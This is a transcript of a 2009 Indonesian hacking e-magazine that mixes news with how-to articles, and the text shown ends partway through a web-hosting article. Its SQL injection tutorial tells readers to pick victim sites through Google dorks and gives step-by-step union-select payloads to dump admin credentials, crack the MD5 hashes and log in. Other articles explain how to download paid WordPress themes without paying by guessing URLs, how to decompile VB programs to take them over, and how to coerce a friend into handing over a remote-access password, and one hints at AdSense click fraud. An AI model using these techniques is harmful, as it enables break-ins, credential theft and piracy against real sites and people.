Hacker eMagazine Vol.1_2
-
Upload
hijack-heuchler-jr -
Category
Documents
-
view
145 -
download
9
description
Transcript of Hacker eMagazine Vol.1_2
www.hackers-center.org
Virus Section – Hal 30
Guitar Pro 5.2 Demo – Hal 36
Decompiler VB – Hal 12
SQL Injection Basic – Hal 14
WooThemes Hack – Hal 20
XSS Attack – Hal 46
- 1- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
HC eMagazine
HC eMagazine..?
HC eMagazine adalah majalah elektronik komputer, internet, hacking dan coding
berbahasa Indonesia yang dibuat oleh staff dan member HC dengan format PDF.
Latar Belakang HC eMagazine :
Makin banyaknya kebutuhan akan informasi dunia teknologi komputer dan internet
membuat HC menjadikan komunitas baru di dunia internet yang menyediakan bahan
referensi dalam dunia cyber khususnya hacking sehingga para pecinta internet tidak
tertinggal informasi.
Tujuan :
Share and Learning adalah moto HC dengan tujuan semua orang dapat berbagi ilmu
dan belajar dari ilmu yang didapat. Serta memberikan pencerahan terhadap dunia
Teknologi Informasi khususnya Hacking dan Security.
Misi :
Menyebarkan ilmu-ilmu komputer, internet dan hacking untuk tujuan Positif hanya
untuk pengetahuan dan tidak untuk disalahgunakan.
Hak Cipta :
Seluruh isi yang ada di HC eMagazine adalah sepenuhnya milik penulis, HC hanya
sebagai media berbagi ilmu dan HC Magazine ini dapat di download dengan GRATIS
dan boleh menyebarluaskan dengan bebas dengan tujuan Non-Profit.
Distribusi HC Magazine :
- HC Magazine Dapat di download secara resmi di www.hackers-center.org
- Website staff dan member HC
- Serta media-media pendukung yang bekerjasama dengan HC
Contact HC Magazine :
- Administrator ([email protected])
- ciebal ([email protected])
- 2- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
» Editorial
Hackers-Center Perjuangan
Forum Hackers Center atau selanjutnya disebut Forum HC adalah sebuah
sarana untuk berbagi dan belajar.
Forum ini berbentuk komunitas dan dibentuk oleh komunitas serta ditujukan
untuk semua kalangan yang ingin belajar dan berbagi utamanya dalam hal
komputer dan internet. Nama Hackers Center sendiri adalah usulan dari
komunitas yang pada awalnya bergabung untuk berbagi pengalaman dan
sharing mengenai dunia komputer dan sekitarnya.
Pada awalnya berdirinya forum ini adalah sebuah forum personal yang
dibangun oleh ANDRE aka NeckLord dan beberapa teman yang lainnya.
Forum awal bernama andresite.us yang dibangun sekitar tahun 2006. Saat itu
hanya beberapa orang dekat yang bergabung, dan belum aktif seperti
sekarang. Andresite berjalan kurang lebih 1 tahun. Kemudian ada masalah
dengan penyedia hostingnya sehingga andresite.us tutup.
ANDRE sebagai pencetus dan dengan beberapa rekan yang lainnya sepakat
untuk membentuk komunitas baru dan diberi nama Hackers Center.
Awalnya forum ini ada di sebuah penyedia layanan forum gratisan.
Alamatnya hackerscenter.informe.com dan sempat berjalan selama kurang
lebih 1 tahun juga hingga akhirnya mempunyai domain dan hosting sendiri.
Kru yang menggawangi HC Informe masih kurang lebih sama dengan
andresite.us dan ditambah beberapa moderator baru termasuk saya.
Pada awal 2007, team ADMIN berkoordinasi untuk mengupayakan domain
dan hosting sendiri buat kemajuan forum. Hingga akhirnya pada April 2007
dipilihlah sebuah domain atas hasil polling. Domain inilah yang sampe
sekaran dipergunakan. HC adalah milik komunitas HC sejak pertama kali
berdiri. HC dibangun dengan asas kebersamaan agar semua members dan
non members dapat saling berbagi dan belajar bersama tanpa kecuali baik
dari suku apapun, ras apapun, agama apapun, bangsa apapun dan
sebagainya.
Kami sebagai para Administrator, Moderator, Contributor dan penggiat
berbagai kegiatan hanya fasilitator untuk mengatur agar semua dapat
berjalan baik dan optimal untuk members dan semua masyarakat IT di
Indonesia.
Trims,
Andre S
Hackers Center Community
Administrator
� NeckLord
� UnderDOS
� Viper
� Nobita HC
Moderator
� Ramz
� ArminVanBuuren
� Equal
� Jackzard
� Kotaro
� Spiderman
� ciebal
� nicx
Contributor
� metropilix
� root
� agitama
� pass_word
� 4L13N
� general_nagabonar
HC eMagazine Writer
� ciebal
� pass_word
� Xyberbreaker
� metropolix
� ramz
� root
� Nobita HC
� eminem
� EiGhtTailz
� omicron9194
� Equal
Contact
� Kirim Artikel
� Kritik dan Saran
Download HC eMagazine
� www.hackers-center.org
� forum.hackers-center.org
� All Supported Us
- 3- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
/Dir � Hot News - Situs phpBB.com Under attacker – hal.4
� Hot News – Defacer kena Deface – hal.5
� Do You Know..? – Apa Adsense itu..? – hal.6
� Show My PC – Mengontrol PC dari jarak jauh – hal.7
� Nature Illusion Studio – Membuat image berjalan di desktop – hal.9
� Decompiler VB – Membajak Aplikasi yang dibuat dengan VB – hal.12
� SQL Injection Basic Tutorial – Konsep dasar SQL Injection – hal.14
� USB WiFi TP-Link – Menggunakan Antena Eksternal – hal.18
� WooThemes Hack – Mendapatkan theme WP premium dari WooThemes – hal.20
� Web Hosting – Penggenalan Sub Domain, Parked Domain dan Add-on Domain – hal.23
� SQL Injection by Xyberbreaker – Membobol situs perguruan tinggi – hal.25
� IP Command – Mengenal IP Command pada CMD – hal.28
� Virus Section – Knowledge, History, Type of Virus, etc – hal.30
� Guitar Pro 5.2 Demo Version – Cracking Software Guitar Pro – hal.36
� Advanced SQL Injection – Test On Windows XP – hal.42
� XSS Attack – Deface Web Tanpa Merusak – hal.46
� Phising Attack – Pengenalan dan Pencegahan – hal.50
� Bedah Web With Schemafuzz – SQL Injection Dengan Metode Schemafuzz – hal.53
� Instalasi Ubuntu 8.10 – Migrasi dari Windows ke Linux – hal.60
� HC eMagazine Writer – Ketentuan Menjadi Penulis HC eMagazine
� Lampiran – Serba-Serbi HC eMagazine
- 4- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
» Hot News
Berita Seputar Teknologi Informasi
Present By : Redaksi HC eMagazine
Situs phpBB.com Under Attacker
CALIFORNIA - Situs milik salah satu penyedia layanan open
source bulletin boards terbesar di dunia, phpBB, berhasil
diterobos hacker. Akibatnya, sebanyak 400.000 username,
alamat e-mail, dan password bocor.
Seorang peretas berhasil memperoleh akses ke database
forum dan mailing list dengan memanfaatkan lubang di
peranti lunak newsletter PHPlist. Demikian seperti dikutip dari
Softpedia, Sabtu (7/1/2009).
PHP Bulletin Board, yang lebih dikenal dengan phpBB, adalah salah satu aplikasi yang paling banyak
dipakai untuk mengelola forum online. Software ini berplatform open source dan dirilis di bawah GNU
General Public License, yang sepenuhnya gratis. Layanan ini dibuat dalam PHP dan mendukung
delapan backends SQL yang berbeda.
Hingga tulisan ini dibuat, situs phpBB.com masih offline. Begitu juga dengan situs-situs lain yang terkait
juga belum aktif. Sebuah pengumuman dibuat saat situs tersebut dikunjungi:
"We are sorry to report that we have been attacked through a vulnerability in an outdated PHPList
installation. phpBB.com and related sites will remain unavailable while we work to recover. No
vulnerabilities have been found in the phpBB software itself."
Situs pusatnya saja bisa di susupi hacker, apalagi ribuan situs yang menggunakan phpBB di dunia. Jika
tidak cepat-cepat di update maka ini merupakan ancaman yang cukup serius bagi pengguna phpBB.
Sumber : techno.okezone.com
- 5- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
» Hot News Berita Seputar Teknologi Informasi
Present By : Redaksi HC eMagazine
Defacer kena Deface
Entah apa yang sebenarnya terjadi dengan situs gorontalodefacer.org ini, yang jelas redaksi diberitahu
oleh seseorang bahwa situs defacer yang cukup terkenal ini terkena deface. Dari sumber yang ada
terjadi simpang siur, tentang siapa yang mendeface situs ini, entah itu dari orang dalam, orang
malaysia, dll. Ramai sekali didiskusikan di salahsatu forum hacker indonesia.
Sampai administrator (EA Ngel, nick di echo. Red) ikut bicara soal ini katanya “Cuma meluruskan aja.
Ak EA Ngel salah satu Admin GorontaloDefacer tdk keberatan site kita kena deface, karena dgn ini
kami [GDC] bisa mengetahui kelemahan [bug / hole] site kami dan kami sangat berterima kasih
pada Xhimes. Soal Xhimes adalah sahabat dari salah satu admin GDC, itu emank benar.” Dikutip
dari echo. Tapi sampai saat tulisan ini ditulis (06/03/09) situs itu masih off, katanya sih masih terjadi
masalah sehingga belum bisa ON. Ini menandakan begitu besarnya resiko yang terjadi di dunia maya.
Tidak ada yang aman di dunia maya. (-Red)
- 6- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
» Do You Know..? Sebaiknya Anda Tau..
Present By : Redaksi HC eMagazine
Apa Adsense itu..?
Singkatnya Adsense adalah layanan iklan milik Goggle. Google
Adsense menyediakan bermacam-macam iklan yang nantinya
bisa di pasang di website kita sesuai kategori iklan yang bisa
kita sesuaikan dengan tema blog kita.
Untuk memasang iklannya, kita tidak perlu membuat sendiri
dan menyediakan server khusus. Anda cukup menyediakan
space atau ruang kosong untuk iklan dan menyispkan kode javascript yang diberikan Google.
Tentunya space iklan yang ada di blog kita harus strategis agar para pengunjung dapat melihat
iklannya dengan mudah dan nyaman.
Untuk Apa Iklan itu dipasang di blog kita..?
Adsense memberikan kesempatan kepada anda untuk mendapatkan penghasilan tambahan dengan
memasang iklan yang disediakan oleh google. Anda akan mendapatkan bayaran untuk setiap iklan
yang di klik oleh pembaca situs. Apa hanya dengan meng-klik saja?
Ya, cukup dengan meng-klik saja, otomatis anda akan mendapatkan sejumlah uang yang nilai
bagiannya diperhitungakn dari beberapa bid yang telah ditentukan oleh si pemasang iklan
(advertiser). Meskipun ada factor lain yang mempengaruhinya, secara umum bagian yang diperoleh
publisher adalah 20% dari niali bid. Berarti kita bisa meng-klik iklan kita sendiri dengan terus menerus
agar cepat mendapatkan uang?
Ya silahkan saja jika anda berani dan tidak ketahuan dengan pihak pengelola iklan, karena secara
peraturan itu merupakan tindakan yang tidak diperbolehkan dan sanksi untuk itu adalah dari mulai
penghasilah anda di hapus sampai akun anda yang di baned.
Bagaimana Pembayarannya..?
Pembayaran akan dilakukan 30 hari setelah total pendapatan anda dalam satu bulan mencapai
minimal $100. Kalau saya dalam satu bulan tidak mendapatkan $100 bagaimana..?
Jangan khawatir, jika dalah satu bulan pendapatan anda tidak mencapat $100 karena itu dihitung
kumulatif. Jadi jika bulan januari anda mendapatkan $30 dan februari $80, maka cek akan dikirimkan
pada akhir bulan maret.
Untuk wilayah Indonesia, pembayaran akan dikirim dalam bentuk cek dan anda dapat memilih untuk
menggunakan jasa pos ataupun DHL (Wxpress Delivery) dalam proses pengiriman cek tersebut. Jika
menggunakan jasa pos, waktu pengiriman biasanya paling cepat adalah 20-25 hari. Sedangkan jasa
DHL cek akan anda terima dalam waktu 2-3 hari kerja. Tapi ada biaya tambahan unuk jasa ini sebesar
$24. Biaya ini otomatis akan dipotong dari pendapatan anda.
Referensi : http://groups.google.co.id/group/give-up/
- 7- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Show My PC Mengontrol PC dari Jarak Jauh
Writer : ciebal ([email protected])
Kali ini gw coba sharing sedikit pengetahuan
gw yang gw dapatkan ketika chat dengan salah
satu moderator HC yang anak SMK Telkom,
hehehe.. Dya yang kasih tau gw tentang hal ini
dan gw coba untuk menulisnya. (Sori ya Ramz,
bisnya lo ngontrol PC gw gak bilang-bilang) ☺
OK gak perlu basa-basi lagi, ikuti caranya
sebagai berikut :
1. Silahkan download App-nya di
http://www.showmypc.com ukuran file
tidak lebih dari 2MB. Lalu jalan kan App itu
di computer lo (akan terlihat seperti ini)
2. Lalu ajak temen lo menjalankan App itu juga
sehingga masing-masing computer telah
terpasang App yang sama. (Ok gw anggap
App dah terpasang yah)
3. Suruh temen lo untuk meng-generate
Passwordnya dengan cara meng-klik tombol
“Show My PC Now” maka secara otomatis
App ini meng-generate Password yang bisa
lo gunakan untuk mengontrol PC temen lo
itu. (Lihat gambar)
4. Jika temen lo sudah sukses menggenerate-
nya maka suruh temen lo untuk
mengirimkan passwornya ke lo. (Klo gak
mau paksa aja, klo gak ancem aja klo lo
bakal rusakin system computernya klo gak
kasih passwornya) hahaha..
5. Setelah lo dapatkan passwordnya sekarang
giiliran lo untuk bekerja! Sekarang klik
tombol “View Remote PC” lalu show my pc
akan meminta password, masukan
password yang temen lo kirim itu.
- 8- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
6. Tunggu deh sampai proses koneksi selesai,
gak akan lama kok kurang dari 1 menit. Jika
koneksi failed ulangi lagi sampai berhasil.
7. Sekarang terserah lo! Mau kamu apakan PC
temen lo itu. ☺
Gw rasa udah cukup jelas, jika mendapatkan
kesulitan silahkan hubungi saya atau diskusikan
di forum. Terimakasih mohon maaf klo tulisan
ini dianggap kurang.
Wassalamualaikum… ☺
Referensi : Hasil pengalaman dan Chat dengan RamzHC
/Nick : ciebal
/Location : Banten - Bandung
/Email : [email protected] or [email protected]
/Web: www.my-ciebal.co.cc
- 9- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Nature Illusion Studio Membuat Image Berjalan di Desktop
Writer : pass_word ([email protected])
Artikel ini awalnya kebosanan gw karena desktop hanya tampilan gambar mati 2D, hari gini masih 2D apa kata
dunia. Langsung aja mulai, Tahu kan ekstensi image yang dapat bergerak yaitu *.gif , nah kali ini gw ingin
mencoba berbagi ilmu membuat image *.gif dengan mudah, cepat, dan pasti dengan hasil yang bagus. Proses
pembuatan nya menggunakan software nature illusion studio, software ini dapat menghasilankan screenserver
dan aplikasi, movie, dan gif. Yang gw bahas disini hanya yang gif.
Yang di perlukan:
- Image (*.jpg, *.bmp, atau *.gif),
- Software nature illusion studio
Download:
http://www.4shared.com/file/84705473/8dca12f8/NatureIllusionStudioProfessionalv180017.html (4952KB)
Mirror: http://rapidshare.com/files/194595746/Nature.Illusion.Studio.Professional.v1.80.0.17.rar.html
(5071KB)
- windows XP (belom dicoba bila di OS lain),
- segelas kopi susu yang ditemani oleh 1 bungkus rokok (ajibb).
ok pendahuluan nya selesai,
TAHAP – TAHAP PEMBUATAN :
1. download nature illusion studio -> install -> masukkan serial number nya,
2. jalakan nature illusion studio -> new -> load image (pilih image lo),
tampilan setelah tahap ke 2
- 10- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
3. Berikutnya gw akan memberi effect pada image, disini gw memakai effect yang membuat api berkobar, agar
terasa hangat ( pura-pura nya), caranya:
Lihat tanda panah effect klik preset -> load -> fire/fog/smoke ->goreskan pada api di image,
Untuk bayangannya, gw memakai effect watter ripple, agar terlihat berada di air.
4. Sekarang melihat hasil nya, klik (preview),
5. Ok sekarang tinggal menjadikan gambar menjadi gif,
Klik build gif -> custom -> setting size = 1024 x 721 dan water speed = max -> create -> save,
effect
membuat *.gif
- 11- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
6. Jadikan image gif tersebut menjadi desktop lo, ga terlalu terlihat kl disini hasil nya, dicoba aja dan
dikembangkan.
OK, sekian dulu semoga dengan ini membuat lo gak jenuh lagi dan selalu berkreasi..
Wassalam…
Created by: pass_word a.k.a bagong
Email : [email protected]
YM : bagong_ipb1
THANX TO : ALLAH SWT, WARNET VINET CREW, ALL STAFF n MEMBER HACKERS-CENTER, EMINEM
(account shutterstock nya makasih).
- 12- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Decompiler VB Membajak Aplikasi yang dibuat menggunakan VB
Writer : ciebal ([email protected])
Alhamdulillah, pada kesempatan kali ini gw
coba berbagi sedikit pengetahuan gw lagi
tentang computer dan tidak lain dengan tujuan
sharing bukan berniat menggurui.
Mungkin temen-temen dah pada tau apa arti
decompiler, singkatnya decompiler kebalikan
dari compiler yang artinya kebalikan dari
menggabungkan dan pasti kalo dah baca
tulisan ini pasti ngerti deh.. So baca terus yah..
☺
Pertama yang mesti lo siapin adalah (seperti
biasa) Software decompiler yang cukup
terkenal dan cukup mudah di gunakan yaitu
VBReformer (lo bisa cari decompiler lain yang
menurut lo mudah, tapi sekarng yang gw bahas
adalah VBReformer).
Download softwarenya di
http://www.decompiler-vb.net/ dan
sebelumnya lo mesti daftar dan Sign In dulu
untuk mendownloadnya (Jangan lupa pilih
yang Free Edition) KLo punya duit sih beli yang
premium. :P
OK, gw anggep lo dah download dan sekarang
Install software seperti biasa. Setelah install
maka akan terlihat tampilan utama yang
simpel seperti ini :
Ok, sebagai contoh gw ambil App yang dibuat
dengan VB oleh s’to jasakom.
Untuk mencari filenya, klik File >> Open >>
Pilih file .exe yang telah di compiler dengan
VB. Sebagai contoh gw pilih App Seni Internet
Hacking yang dibuat oleh S’to Jasakom.
(setelah pilih file aka nada warning, tapi jangan
khawatir klik continue aja)
- 13- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Screenshot di atas adalah file App yang
digunakan untuk menonton Video Seni
Internet Hacking yang dibuat oleh S’to.
Q : Bagaimana untuk mengubah file itu..?
A : Gampang kok, sekarang lo tinggal Klik File
>> Save Project As >> pilih tempat dimana lo
mau nyimpen project itu.
Sekarang lo dah punya project VB yang bisa lo
edit di Software Pemrograman VB 6 atau
bahkan VB 2008. (rada rumit di VB 2008) :P
Pasti dah gak asing kan App ini..?
Sekarang lo bisa edit semau lo dan dengan
desain lo sendiri. ☺
Q : Tapi kok gw coba decompiler AVG,
Transtool, Photoshop, dll gak bisa..?
A : Wedew, gak semua file .exe bisa jadi lo
coba-coba aja semua file berekstensi .exe ☺
OK, gw rasa dah cukup jelas sampai sini apabila
masih ada kesulitan silahkan hubungi gw selagi
gw bisa bantu (tapi klo gak bisa bantu maaf ya,
gw juga baru belajar). Semoga dengan ini lo
bisa mendapatkan inspirasi untuk membuat
suatu program dengan VB, tapi inget kita disini
bukan untuk menjadi Plagiator so jadikan
tulisan ini sebagai ilmu pengatahuan belaka.
(sok alim deh gw) xixixixi..
/Nick : ciebal
/Location : Banten - Bandung
/Email : [email protected] or [email protected]
/Web: www.my-ciebal.co.cc
- 14- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
SQL Injection Basic Tutorial Konsep Dasar SQL Injection
Writer : Metropolix ([email protected])
Nah.. sebelumnya kita cari tahu dulu nih pengertian sql injection… ok!
Searching… searching di paman Google.., nah.. dapat deh
rangkumannya. He..he..he..
Yup, SQL injection adalah sebuah aksi hacking yang sering dilakukan di
aplikasi client dengan cara memodifikasi perintah SQL yang ada di
memori aplikasi clien dan juga merupakan teknik mengeksploitasi web
aplikasi yang didalamnya menggunakan database untuk penyimpanan data.Wew..(lengkap ya bro
andrea… Copas lo yah?? Tau ajah,,wakakakakka.)
Macam-macam Perintah SQL injection:
Karakter: ‘, -
comments: /*,--
information_schema untuk versi: mysql versi 5.x , tidak dukung untuk mysql versi 4.x
(menurut gw)
allinurl: news.php?newsid=
inurl: /berita.php?id= (atau dengan dork yg lain juga bisa.. tergantung kreatifitas kamu.)
1. Tahap Pertama
Cari korban di paman Google..
Anggap saja kali ini target kita [website]/berita.php?id=20
Tambahkan karakter ' pada akhir url atau bisa juga dengan menambahkan karakter "-" untuk melihat
apakah ada pesan error.
contoh:
[website] /berita.php?id=20' atau
[website] /berita.php?id=-20
Apabila kira-kira ada pesan seperti ini “ You have an error in your SQL syntax”. Berarti terdapat bugs
dalam web nya.
- 15- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
2. Tahap Kedua
Sekarang kita mulai mencari dan menghitung jumlah table yang ada di dalam Databasenya.
Dengan melakukan Perintah: order by
Contoh:
[website] /berita.php?id=-20+order+by+1-- atau
[website] /berita.php?id=-20+order+by+1/*
Kita coba satu persatu untuk menebaknya..
misal:
[website] /berita.php?id=-20+order+by+1- -
[website] /berita.php?id=-20+order+by+2- -
[website] /berita.php?id=-20+order+by+3- -
[website] /berita.php?id=-20+order+by+4- -
Lakukan terus sampai hilang pesan erornya..( kalau gak hilang-hilang pesan erornya gmn bro andrea??.. Artinya
Comp loe yg eror..wakakakka)
Contoh: [website] /berita.php?id=- 20+order+by+4—
Nah.. pesan eror nya hilang di angka itu.Berarti yang kita catat adalah sampai angka 4.
Menjadi [website] /berita.php?id=-20+order+by+4—
3. Tahap Ketiga
Sekarang kita akan mengeluarkan angkanya dengan melakukan perintah:
Contoh: [website] /berita.php?id=- 20+order+by+1,2,3,4—
Cilukba…. Keluarlah angkanya.. anggap saja kali ini angka yg keluar adalah angka 3 dan angka di bawahnya
angka 4.
Yup,dibagian itulah web tersebut bisa kita cari username admin dan password sang admin.Liat angka pertama..
angka 3.,
Untuk Mengetahui Versi SQL nya,gunakan perintah version() atau @@version,dan masukkan di angka yg keluar
tadi.
Contoh:
[website] /berita.php?id=-20+union+all+select+1,2,version(),4—atau
[website] /berita.php?id=-20+union+all+select+1,2,3,@@version,4—
Liat versi yg digunakan admin,apabila versi 4 kita lupakan saja dan cari target yang memakai versi 5.
Kalau versi 5 berarti kita beruntung tak perlu menebak table n column seperti ver 4
karena di ver 5 ini bisa menggunakan perintah From+Information_schema.
- 16- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
4. Tahap Keempat
Untuk menampilkan table yang ada pada website target kita dengan melakukan perintah:
Group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
+from+information_schema.tables-- >>> dimasukan
setelah angka terakhir
Contoh:
[website] /berita.php?id=-
20+union+all+select+1,2,group_concat(table_name),4+from+information_schema.tables—
Akan keluar isi-isi table databasenya.
5. Tahap Kelima
Zzzzz…ini tahap yang menyebalkan menurut gw,karena disini dibutuhkan kesabaran yg tinggi. (ceilehh..
bahasanya.. wakakaka)
Ok,,kita cari tahu table yang mengandung username admin dan passwordnya.
Kita cek satu persatu per satu isi table nya,, karna table-table database itu masih
bentuk ascii kan ga bisa di baca...maka harus di convert ke hex dulu.cari di google website buat
mengkonversinya.
Nih ada contoh tools nya:
• http://andrea-metropolix.com/tools/ascii.html
• http://www.dolcevie.com/js/converter.html
• http://www.industrialtrainer.com/Unicode.shtm
Contoh kata yang ingin di konversi yaitu “ admin “ dan bentuk hex nya ada 61646D696E.
Kita lanjut cari data table yang mengandung username admin sama passwordnya,,okeh!!
group_concat(column_name) >> dimasukkan pada angka yang keluar tadi.
+from+information_schema.columns+where+table_name=0x[hasil dari +convert ascii-hex]-- >>
ditambahkan pada angka terakhir.
Contoh:
[website] /berita.php?id=-
20+union+all+select+1,2,(group_concat(column_name),4+from+information_schema.columns+where
+table_name=0x61646D696E—
Dari situ kita akan dapat isi-isi tablenya.. missal isi tablenya: user,username,password.
- 17- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
6. Tahap Keenam
Tahap terakhir ini kita akan mencoba mengeluarkan isi data table tadi,masukkan kedalam “ column_name “
dengan perintah:
group_concat(0x3a,username,0x3a,password) >>>> dimasukkan pada angka yg keluar tadi.
+from+admin-- >>>> dimasukkan pada angka terakhir.
Dan Akhirnya… Cilukbaaa!! keluarlah username admin dan passwordnya..
Contoh: admin: fdfbe5666d7cd46517daeef2ba28fbb2.
Username: admin
Password: fdfbe5666d7cd46517daeef2ba28fbb2
Tinggal cari halaman login adminnya dan selesai. :D
Hmmm….. kok gak bisa login nya ndre??
Itu artinya passwordnya di enscrypt pakek MD5,cari aja crack online nya di google, atau di mIrc banyak kok Bot
buat nge Crack MD5.
Happy hunting ….!!
OK yah semua.. sampai sini dulu tutorial saya mengenai dasar SQL injection. Sebenarnya masih banyak lagi cara
yang bisa di gunakan,tergantung kreatifitas kamu.
Mohon maaf jika ada kekurangan dalam tutorial ini.,saya sendiri masih sangatlah newbie dan masih butuh
bimbingan.
~ Salam hangat metropolix
Spesial Thank’s Hackers-Center , Balikita ,Yogyafree , Gorontalo Defacer
T UnderDos T Coco_n4kal T tukulesto Tgblack T bl4ck_3n91n3 TOkacybernet T
crazydavinci T
T Ramz TAgitama Tmamet-tossa T tucker Tindomie T
===============================================================
===============================================================
- 18- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
USB WiFi TP-Link Menggunakan Antena External
Writer : root ([email protected])
Bagi yang memakai USB type ini kemungkinan agak kecewa bila
dibandingkan dengan merek lain. Nah disini kita coba untuk
mengoptimalkan perangkat ini dengan cara menambahkan
antena kecil 1/4Lambda di luar chassingnya.
Bahan yang digunakan untuk tambahan antena harus
memenuhi untuk standart frequency, yang artinya ga
sembarangan tembaga / kabel bisa dipergunakan. Di percobaan
kali ini kita pakai bekas antena HELICAL / bawaan dari radio
merek EDIMAX, JAHT, MINITAR, LINKSYS, dll yang biasanya tidak dipergunakan lagi karena radio
tersebut sudah dipasang di outdoor memakai antena external GRID, OMNI, ataupun SEKTORAL.
Antena HELICAL tersebut kita pergunakan kabelnya aja yang ada di dalam, jadi kita terpaksa bongkar
antenanya sehingga mendapatkan kabel COAXIAL beserta pipa GROUND, dalam proses ini perlu
ketelitian dan penuh hati-hati supaya kabel COAXIALnya tidak rusak atau putus.
Setelah mendapatkan apa yang kita cari maka barulah kita bongkar chassing USB TP-Link dengan
dicutter di bagian pinggir. Di dalam rangkaian akan kelihatan pada bagian ujung ada semacam antena
panel berukuran mini yang terbuat dari jalur tembaga di PCB.
Potong jalur antena tersebut dengan cutter yang mengarah pada capasitor, hati-hati juga dalam
melakukan hal ini, kalau tidak kelihatan wajib memakai kaca mata atau kaca pembesar. Sewaktu
memotong jangan terlalu dalam, hal ini dimungkinkan agar di dalam PCB ada tidak jalur lain yang ikut
terpotong.
Lubangi samping chassing untuk memasukkan kabel COAXIAL yang kita dapat tadi, kelupas bagian
pangkal kabel kira-kira 5mm, masukkan kedalam lubang tadi dan solder bagian tengan kabel ke
capasitor paling ujung. Untuk bagian serabut solder juga pada ground jalur PCB.
Tutup kembali chassingnya dan tetesi dengan lem Alteco sedikit saja. Bengkokkan antena external
tadi sesuka yang anda mau. Test untuk scanning sinyal dan bedakan perubahan yang terjadi dengan
sebelum anda kasih antena external ini.
Lebih baik untuk chipset dikasih heat sink sekalian, karena biasanya chipset USB WiFi cepat panas
yang mengakibatkan umurnya tidak bertahan lama.
- 19- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Setelah hasilnya memuaskan barulah project selanjutnya kita pasang USB WiFi tersebut tepat di
depan reflektor parabola, entah mau pakai WAJAN, ASTRO Disc, INDOVISION Disc, bahkan PARABOLA
besar 9feet sekalipun.
root@HC A.K.A chepoek
- 20- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
WooThemes Hack Mendapatkan Themes WP Premium dari WooThemes
Writer : ciebal ([email protected])
Hi, All..
Moga gak bosen yah dengan gw, sekarang gw mau coba berbagi sedikit trik bagaimana mendapatkan themes
premium Wordpress milik Woothemes tanpa membelinya. Hari gini themes aja masih beli ? :P
OK Langsung menuju TKP, buka www.woothemes.com nanti akan muncul halaman seperti ini :
Sekarang lo pilih themes yang lo inginin, (yang ada tombol Buy)
Gw anggap lo milih themes dengan nama Crushy, OK? Sekarang kita mulai.. ☺
Coba lo arahkan mouse lo kea rah tombol “Buy this thems” lalu lihat di status bar >>
- 21- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Perhatikan URL-nya yaitu : http://www.woothemes.com/my-downloads/xxxxxxxxxxx yang gw kasih
tanda xxxxxxxx itu adalah URL target kita. Sekarang lo mau download theme bernama Crushy lalu
masukan URL menjadi www.woothemes.com/my-downloads/cushy.zip
- 22- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Lalu apa yang terjadi..?
Inilah hasilnya. Themes Premium dari Woothemes dengan mudah kita download tanpa bayar dan
tanpa mengahabiskan waktu lama. ☺
Intinya adalah pada URL www.woothemes.com/my-downloads kita hanya menambahakan nama dari
themes tersebut, kalau tadi contohnya adalah theme cushy maka tambahkan dibelakangnya
cushy.zip.
Simpel kan..?
Kalau mau liat themes dari WooThemes, bisa liat blog gw (www.my-ciebal.co.cc) itu yang gw pake
theme premium dari WooThemes .Sekarang lo bisa download tuh theme sepuasnya.. hehehe..
Sampai disini dulu deh, dah ngabisin berapa halaman neh Cuma buat ini aja. Makasih…
/Nick : ciebal
/Location : Banten - Bandung
/Email : [email protected] or [email protected]
/Web: www.my-ciebal.co.cc
- 23- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Web Hosting Ng’gak ngerti apa itu Sub Domain, Parked Domain, n’ Add-on Domain?
Writer : Nobita HC ([email protected])
Sebelum memulai artikel ini. Gue mau ngucapin dulu terima kasih karena telah
diberikan kepercayaan untuk membuat sebuah artikel yang mungkin nantinya
dapat berguna buat teman2 semuanya. N gue juga minta maaf kalau
hanya bisa membuat artikel yang sangat sederhana seperti ini.
Ok, jangan basa basi lagi (entar malah gak enak ☺). Langsung aja masuk pada pokok permasalahan. N
ada satu lagi yang gue mau tekankan... Artikel ini khusus yang belum pada tau aje ye...!!! kalau yang
sudah tahu mohon koreksinya.
Sub Domain
Untuk istilah yang satu ini sangat sederhana. Gue langsung contohkan, loe pasti sangat kenal n ingat
dengan alamat situs hackers-center.org ☺. Nah alamat yang diberi warna merah (hackers-center) itu
disebut Domain sedangkan .org itu adalah TLD (Top Level Domain) yaitu akhiran dari suatu domain
yang menunjukkan status organisasi.
Eh, tapi tunggu dulu, kan yang lagi dibahas ini sub domain, kok malah bahas domain... ☺. Loe ng’gak
perlu khawatir broo... soalnya bahasan kita ini saling berhubungan. Kalau loe sudah paham dengan
domain maka untuk mengartikan sub domain sangatlah mudah. Sebagai contoh gue mau membuat
sebuah direktori yang akan mengakses ke hackers-center.org/forum nah untuk mempermudah akses
gue akan membuat sebuah sub domain forum.hackers-center.org, nah forum itu adalah sub domain
